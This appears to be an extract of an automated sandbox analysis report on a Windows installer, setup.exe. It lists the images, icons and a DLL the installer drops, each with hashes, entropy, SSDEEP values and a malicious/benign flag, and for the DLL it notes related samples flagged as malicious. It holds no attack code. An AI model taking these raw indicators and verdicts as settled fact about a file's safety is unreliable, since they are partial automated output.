                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="F6E435DCD16DBE3081E67A9BF3EA6B5E" xmpMM:DocumentID="xmp.did:FEF08EB1C43011EB94B9F7A7E9A94910" xmpMM:InstanceID="xmp.iid:FEF08EB0C43011EB94B9F7A7E9A94910" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e614fedb-25db-5740-b976-753b5fbc3679" stRef:documentID="adobe:docid:photoshop:4c1a3bc8-b220-ab4a-8972-fc04083d2ebd"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 625x395, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):16673
                                                                                                                                                                            Entropy (8bit):7.308169831606533
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:S8rDbRvc6xM8F3YSzXnN4kjwazD9iV3CUzy3FqI4Oj:S8rDtvc6n1YKN42DUV3i3FKg
                                                                                                                                                                            MD5:A6CC6F0799276EC0C0B8704FDC91236B
                                                                                                                                                                            SHA1:CC5671B0B3F3CD3E17FB4D9C916A32547090528A
                                                                                                                                                                            SHA-256:557059C8C0488F9F9681A16AC5448BA8470321CF40E63526499C5151177D59A7
                                                                                                                                                                            SHA-512:A474848F1BA8BE2CF7DEC2E5EE75E6091C9712C42D8F2775000412FF1652D2E9D282602FB3E413BDA01E34FBAF113C4B140715B1AEB48BF9583BA303EECD8969
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="F6E435DCD16DBE3081E67A9BF3EA6B5E" xmpMM:DocumentID="xmp.did:61B7B381C43711EBA3CAD5AB122A08BF" xmpMM:InstanceID="xmp.iid:61B7B380C43711EBA3CAD5AB122A08BF" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:e777c167-6c3b-8b45-ba8b-bf8f7256b6c0" stRef:documentID="adobe:docid:photoshop:84aff0ee-2a1f-f449-9eac-0bf010aafe17"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 938x593, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):27770
                                                                                                                                                                            Entropy (8bit):7.0636804814851875
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:d8DRDaplr71odDiC/tVJ3htS3qcr97VgiU/:0EjH21nJHS3qc57tE
                                                                                                                                                                            MD5:DE300C8B0A317B6E29A47FACFA76A6C0
                                                                                                                                                                            SHA1:6576993EE6CF1BDE4845B6303BFF0DA5CB2AE255
                                                                                                                                                                            SHA-256:B82327CBF824FDF633C20B13C19A91FAA950F18C580675F2AB49F8CC7BA77FA4
                                                                                                                                                                            SHA-512:DE5F39E59210C38126444008623B66612CD9B3226B966D0F90D059C8E85525BEC296D9CFE89AB5A2D89EA884A8FC4D6AD9C96FDECA9F22780E3972B2C81DEEEC
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="F6E435DCD16DBE3081E67A9BF3EA6B5E" xmpMM:DocumentID="xmp.did:7BE8A297C43711EB8166B4FB14955B7A" xmpMM:InstanceID="xmp.iid:7BE8A296C43711EB8166B4FB14955B7A" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:899e2b57-a43b-d647-9323-41ea3680c438" stRef:documentID="adobe:docid:photoshop:50661c56-e161-034b-aab4-d332a6df85b2"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1875x1185, components 3
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):69692
                                                                                                                                                                            Entropy (8bit):6.082855384914949
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:Q2gs8VvwWGnkZTwufTZkYAekzvxaYyhzHL:D8V91w+ZnAtjx+zr
                                                                                                                                                                            MD5:816C6B957BD8ED6A79DFA6A1EB9C57A1
                                                                                                                                                                            SHA1:60036B702CBA91E446039C9432898FDE72E7B00D
                                                                                                                                                                            SHA-256:F192D3EC0EC36BDD0614A61851F73714DB8D68900F891760AC30A33C2741D4DD
                                                                                                                                                                            SHA-512:9001244C1D54AEBED9B88BE1BFF12FF65BE6A29C1292AE7FA2DE2BBD4D889D81D3344A9C02262DD9B1F70AFA7F84592EF31799E6F2B1F9477154B53B10104A40
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:......JFIF..............Ducky.......<.....}http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="F6E435DCD16DBE3081E67A9BF3EA6B5E" xmpMM:DocumentID="xmp.did:91A4FA10C43711EB8B9BAF848460155F" xmpMM:InstanceID="xmp.iid:91A4FA0FC43711EB8B9BAF848460155F" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8f9355ef-3a2e-f044-b70e-4c47f221b2b1" stRef:documentID="adobe:docid:photoshop:94c02c68-8c9f-ce41-9654-6287b20ac7f6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...C........................................................ "..".
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):33179
                                                                                                                                                                            Entropy (8bit):4.256250067040064
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:VpZxTZxf525K1Wz9w5HENvBlPdBXqo4yw1ELYO2i:jTZy5KL5wMoHM8
                                                                                                                                                                            MD5:9A3A9D5895B3645C3CCCAA4DD20C2358
                                                                                                                                                                            SHA1:54872FCD8F36757B372A77F61F89209687C3AEE0
                                                                                                                                                                            SHA-256:135CC57F4BBC69C47464D4CF315AD7BA4852FD956D40DD86B6D3FBA3373DF28C
                                                                                                                                                                            SHA-512:B6329658DF74613C3643E28436A7B282C47D0F73A4424D2EC3CA34D33474E2A8E785DDCC05C0AD296A80D8CD6218691A1A2456080942DBFF8CBCD51FC1F6D6B8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 25.2.3, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Mono_1_" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 500 316" enable-background="new 0 0 500 316" xml:space="preserve">..<g id="Layer_1_xA0_Image_1_">..</g>..<g id="Rectangle_2_xA0_Image_1_">...<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="81.708" y1="-0.2944" x2="81.708" y2="315.2888">....<stop offset="1.723294e-03" style="stop-color:#06409A"/>....<stop offset="0.1268" style="stop-color:#133F96"/>....<stop offset="0.358" style="stop-color:#353D8C"/>....<stop offset="0.6699" style="stop-color:#6C397C"/>....<stop offset="1" style="stop-color:#AE3569"/>...</linearGradient>...<rect x="0.1" y="-0.3" fill="url(#SVGID_1_)" width="163.1" height="317"/>..</g>..<g id="app_x5F_logo_xA0_Image_1_">...<g opacity="0.15">....<defs>.....<rect id="SVGID_2_"
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.486912391627119
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:+jsnrGWGIxANQAI2DZ4uHnIdUsbTgvCh3gs//oUvz4tbr4/w:+YzxkQAj4eIdqv8T//3+bsw
                                                                                                                                                                            MD5:3FBB7DDBC13EDF109E3ACAA7A4A69A4E
                                                                                                                                                                            SHA1:BF53201D998ED6E6F2E07584EFDA9585113AEB0E
                                                                                                                                                                            SHA-256:F8429073C7A83377AD754824B0B81040D68F8C1350A82FF4DCCF8BC4BF31F177
                                                                                                                                                                            SHA-512:CF818A9E88002D373019C0F3C9AF1BE27F20E074C662973898724124EC40F95CEC89F73D4A2F693C73D63981109EFB135057DEEC9245865C3F6351C128AB93D2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 3 x 24, image size 38, resolution 3778 x 3778 px/m, cbSize 92, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                            Entropy (8bit):2.4736059384431
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:k6llllDlxTolR9WZfA1n:k6l1rol7u41n
                                                                                                                                                                            MD5:0EDD17E9905D463CE23FBAE64563C8DA
                                                                                                                                                                            SHA1:2C26D30E1B7A5761F5048D9494349CAFE40979D9
                                                                                                                                                                            SHA-256:237E098ED029198E9F7CFE71BABD6BF9FF3962ED78A263DC7426EA663E601467
                                                                                                                                                                            SHA-512:FC358AD0F2E482AD51AF201F2883259DFCF0D577DB1BE8CFF2B9048F22827278CF0CB8A3F76475222D86BE7E945CE9B34AA9B86FC625C908FFAEA0AD6B1EA2C2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 3 x 24, image size 38, resolution 3778 x 3778 px/m, cbSize 92, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                            Entropy (8bit):2.4736059384431
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:k6llllDlxToltIAlll:k6l1roliAll
                                                                                                                                                                            MD5:1B38EF93DF0C5D4C6C2A10CA0115A28D
                                                                                                                                                                            SHA1:17FA1779A66696F9EE1406DA73133745EB4429DD
                                                                                                                                                                            SHA-256:4292EA3565B63946777D999352A1986E8F5950F1E8E51F030443F05DBDBDE57D
                                                                                                                                                                            SHA-512:1B0B3C6FE0F359AE383D3D5B069341A900AFF610E91D7752D4290FAFE11AC73DFF3CA349DEB6599A6D358ADD4C769AE6CB05C2B751DBBCE738BAE4082167E8E4
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1 x 3 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):68
                                                                                                                                                                            Entropy (8bit):2.192775525356426
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:84lul0lblxBrul/n:84luKRm/n
                                                                                                                                                                            MD5:445B2B911B105CED9B1A3A5CAAA594DD
                                                                                                                                                                            SHA1:C326010A040A6D19837360907745A7A05982254F
                                                                                                                                                                            SHA-256:ECFC46E3BA63CC8D7DE04134A271B171D9EFD714E4CE9611115836A5B4518E63
                                                                                                                                                                            SHA-512:1DED63A90006BD2BFDDB1DE399D0CB483E52A94113E43B3099B6BF3DC7A9A0C7AE74249EBAA600D0D184615661F2FF557B62ED65F073BFAEFC4F84E0CB420360
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1 x 3 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):68
                                                                                                                                                                            Entropy (8bit):2.192775525356426
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:84lul0lblxs7l:84luKYl
                                                                                                                                                                            MD5:7610648B8E31404E1621A7A5B510B86D
                                                                                                                                                                            SHA1:D51D517A8472BFE40C469AFA8869385D5A0E9783
                                                                                                                                                                            SHA-256:48837B62A6A6BC71359FF74BBE8A672D6B23CC30344C12E006698F069890A2B3
                                                                                                                                                                            SHA-512:24B03969FD28DE9919D86609BEC03E6ED732ED78B8E0DE3F2FE5253180817D1471E3ED004ABB5ECD91885B6281CEF1B8E508E38E6F76FDCFB88A29E308AC78DD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 3 x 24, image size 38, resolution 3778 x 3778 px/m, cbSize 92, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                            Entropy (8bit):2.4736059384431
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:k6llllDlxToljolT1Evn:k6l1rolj4ZEv
                                                                                                                                                                            MD5:C288357164D52B2CFD695C792074323B
                                                                                                                                                                            SHA1:C8B7B1DDB78C929AD56D8BBD57FF5449AFA04BE3
                                                                                                                                                                            SHA-256:709D6FDBE00694F7DC115E923188F62CDC72D39E739280A1AFF072D1A49D2674
                                                                                                                                                                            SHA-512:8D07E5C163C9E4B0D04A861E00BE1F578D7A77C2F3EBA80DEB3895B2B354D4015FF1905A2DFCDCCC1B8EC839359DCC302E09F753623AA7F0DF212540CE8A56B2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 3 x 3 x 24, image size 38, resolution 3778 x 3778 px/m, cbSize 92, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                            Entropy (8bit):2.4736059384431
                                                                                                                                                                            Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 1 x 22 x 24, image size 90, resolution 3778 x 3778 px/m, cbSize 144, bits offset 54
Category:dropped
Size (bytes):144
Entropy (8bit):4.230902217075131
Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 1 x 22 x 24, image size 90, resolution 3778 x 3778 px/m, cbSize 144, bits offset 54
Category:dropped
Size (bytes):144
Entropy (8bit):4.1919463804470976
Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 3 x 1 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
Category:dropped
Size (bytes):68
Entropy (8bit):2.192775525356426
Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 3 x 1 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
Category:dropped
Size (bytes):68
Entropy (8bit):2.192775525356426
Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 3 x 1 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
Category:dropped
Size (bytes):68
Entropy (8bit):2.192775525356426
Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 3 x 1 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
Category:dropped
Size (bytes):68
Entropy (8bit):2.192775525356426
Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 6 x 25 x 24, image size 502, resolution 3779 x 3779 px/m, cbSize 556, bits offset 54
Category:dropped
Size (bytes):556
Entropy (8bit):5.636769477117101
Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 6 x 25 x 24, image size 502, resolution 3779 x 3779 px/m, cbSize 556, bits offset 54
Category:dropped
Size (bytes):556
Entropy (8bit):5.618119058335867
Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 1 x 3 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
Category:dropped
Size (bytes):68
Entropy (8bit):2.192775525356426
Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 1 x 3 x 24, image size 14, resolution 3778 x 3778 px/m, cbSize 68, bits offset 54
Category:dropped
Size (bytes):68
Entropy (8bit):2.152262473854022
Encrypted:false
Malicious:false
Process:C:\Users\user\Desktop\setup.exe
File Type:PC bitmap, Windows 3.x format, 6 x 25 x 24, image size 502, resolution 3779 x 3779 px/m, cbSize 556, bits offset 54
Category:dropped
Size (bytes):556
Entropy (8bit):5.484479797867763
Encrypted:false
                                                                                                                                                                            SSDEEP:12:alUzav1+uv1+uv1+uv1+5wenBOdgsNsC/lY8G4/Kg83RroZoL/0MSiOG0Jj0/BeO:a23fff5weBOXr7/Kg83CSXOG0JI/BeHu
                                                                                                                                                                            MD5:50656C6F33CB1490EEE92CFCF2F4FA80
                                                                                                                                                                            SHA1:CA5A3FE9B1F6130E6452CEDF5D3734781F6E150B
                                                                                                                                                                            SHA-256:EF8FC7A18AF77FED42BF20FD640543B0CFAF312A4C9DFC0C2F35CE1AF9AE58E9
                                                                                                                                                                            SHA-512:B8E2E2945FCB5699E063BFDAD3FC6AE72BE96BF342883DC60B8AC81C4143888AA23CCF237B935F56B5F586AFE4772EDA39B443E0797385ED358638CB7052EEC6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 6 x 25 x 24, image size 502, resolution 3779 x 3779 px/m, cbSize 556, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):556
                                                                                                                                                                            Entropy (8bit):5.599477820967879
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:alUPuuuxqOeayLeVnA1TbHusQA+RgZpEH8An1s:a2oqO2fHusQpIE5nK
                                                                                                                                                                            MD5:4178D84D2CD986063D2A7C91C57295D2
                                                                                                                                                                            SHA1:FC5EA9402CD9C325716A2B79D070AC3E756C9F2F
                                                                                                                                                                            SHA-256:5365B988C102E46F73418EC36E0DE5B1749C2080C3D2DA660C507A9C505F333E
                                                                                                                                                                            SHA-512:ACA1CA7E16049ADF1B26DC8D26E99461069FD133587E748012347E66EEF9BDB90FDA0D197C86334667CC04B0289CFBE8FE8727EABF3BDE9827A1066A71133A32
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.347251063198798
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:+h7OMtMrJbDG0UDLHMrhmZ1galQpAAAAAAAAAAAS55qjOlr9n:+6g0uyi1ZQpAAAAAAAAAAASXqjOp9n
                                                                                                                                                                            MD5:8595D2A2D58310B448729E28649443D6
                                                                                                                                                                            SHA1:08C1DF6FBF692F21157B2276EB1988AC732FF93C
                                                                                                                                                                            SHA-256:27F13C4829994B214BB1A26EEF474DA67C521FD429536CB8421BA2F7C3E02B5F
                                                                                                                                                                            SHA-512:AE409B8F210067AC194875E8EBF6A04797DF64FA92874646957B2213FB4A4F7DA2427EF1ED8D35CD2832B2A065E050298BAC0FC99C2A81DE4A569A417C2A1037
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.9105220993102248
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:+7d0iiiiiiiuiiiiiiiZiiiiii0DMiiiiiiZiiiiiPiiiiiDfiiiiiMiiiii1Ji3:+TB4Gds1E2fVE5MF+mJwnwewO
                                                                                                                                                                            MD5:EAC3781BA9FB0502D6F16253EB67B2B4
                                                                                                                                                                            SHA1:5EFF4FCDC405732702432008AB43164CA6F37101
                                                                                                                                                                            SHA-256:F864E8640C98B65C6C1B9B66A850661E8397ED6E66B06F4424396275488AF1BE
                                                                                                                                                                            SHA-512:D108687995B5B02778FC7ACF3A66706E761103B1EE47305D852BF9A190BDF1722B4C6277A13B65BDAD9F4E3F92406F5C7B1B06444D1493F2D4B1AAEAF4176E06
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):22848
                                                                                                                                                                            Entropy (8bit):6.8705781741307765
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:iOw0cxp5wbrBgrjrI/ehLI/ehDvZYLX2Ip4kR4qjdAA1m5wMPhzmubmm+ccP:iOAxMVTacaDRYT2Ip484qxf1mlZxbWP
                                                                                                                                                                            MD5:9D67E3BE4D83160D24FEE65F6E1868E5
                                                                                                                                                                            SHA1:9AED13C010F24C6888DA91D883A1A31AC45E029A
                                                                                                                                                                            SHA-256:4FC58D819A4BC75CB8170192E34FDB17E31C38831A7230ED0E03A30EB38CCF9D
                                                                                                                                                                            SHA-512:73AF8E17FA6C949FFB0861118A10B362DEA4A236B60912497E8F97C75CC8EBE3CDDBC8018A4E8CF24B539DA6122790FDB081CF4B68C59197EC579E13191372EB
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: Typora#U5b89#U88c5#U52a9#U624b.exe, Detection: malicious, Browse
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.8375433162027344
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:+SqmR4fTBOTPsbZX78rXSEUFJVkKuCWGDiPlBaBR6J/g/ic9teKUwj11FQ:+SqmiTXZLPjkKuCNU7wic6PR
                                                                                                                                                                            MD5:1FFFE5C3CC990D0C012A428A59B2AE46
                                                                                                                                                                            SHA1:FAE8042826087D9BB4CD4194E7453D56A773EA64
                                                                                                                                                                            SHA-256:45791627AE8E67E6B616117CF21F04DA381722FAF08D07C0C25E0F28C9B8F82B
                                                                                                                                                                            SHA-512:694D63747AD129CA06EBD743E4090642E557F2260C62AA625321BC309C1E2E58D9BFFF1E0AEE37EFFE5FD4628938AD89B659C9ABB43FDC2CF2285212C1A209F2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):15086
                                                                                                                                                                            Entropy (8bit):3.5353892544389707
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:+7mrhLDFPIc+Q0VDnSOVKaZ8y4mV4pZeJh:+OhHFPvJurSV24mVb
                                                                                                                                                                            MD5:915E40A576FA41DC5F8486103341673E
                                                                                                                                                                            SHA1:528CF57F3775638E721C20A6988DBD322FB39273
                                                                                                                                                                            SHA-256:BF21B2BC3E7253968405F3D244CDB1C136672A5BDB088B524A333264898A2D11
                                                                                                                                                                            SHA-512:66385B58942BAF62B6B33AB646EA981D4A6682F8570B7DF4EFA1A7F4536CB35FE065803314877E95338B8DFB9A854E06A110BD0C2A2D3CE3A7C587E35006649E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 27 x 17 x 24, image size 1430, resolution 3778 x 3778 px/m, cbSize 1484, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1484
                                                                                                                                                                            Entropy (8bit):5.656316816992476
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:/g99999999999999999999hsJRuuuuuuExc8XyGMochMVVH:XLuuuuuuEa8qocYVH
                                                                                                                                                                            MD5:BA8DE1A4FB2E3CA280CD7A3F72D28BCD
                                                                                                                                                                            SHA1:4BCB1FBE1390EB0101DF72725B34E364EC0CC551
                                                                                                                                                                            SHA-256:A3F47F44AD19A5E5B42204DA311A883025F4F7D951BBD427EDB3A20D759FC5E8
                                                                                                                                                                            SHA-512:DFC97335A12E1B33209E2DAC7F222DBEA7F71B93BCD6E4689DD409CBAB6096C78210527F1ABE0C3BB00BBE5CB38B3691B9355AA04D92975C3348B2096C141407
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 27 x 17 x 24, image size 1430, resolution 3778 x 3778 px/m, cbSize 1484, bits offset 54
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1484
                                                                                                                                                                            Entropy (8bit):5.732898239435208
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:BHl65uuuuuuuYOrCUFae2qUAAAAAAAAAAAAAAAAAAAAEaxM:hl65uuuuuuuhCi2VAAAAAAAAAAAAAAAB
                                                                                                                                                                            MD5:02F22AFAE35430F2092E77BF1CA577B0
                                                                                                                                                                            SHA1:91F97B9E65A972DA62FA1F1254B6D1EF1F0E80B8
                                                                                                                                                                            SHA-256:D36ECF7B57C82496E41F7F5F36FCF21BE7F0C061B999C5662F18530909AB6542
                                                                                                                                                                            SHA-512:FAE0D6E818C987EF1C7829301B39DA098E4766B4A33BAC04A7B4D42E68A3B6DF3D3A6B4C3E29D31BC0CB48B541C8316D4ECC3216F6C2AA7827E2DF5AA1A57786
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Users\user\Desktop\setup.exe
                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 27 x 17 x 24, image size 1430, resolution 3778 x 3778 px/m, cbSize 1484, bits offset 54
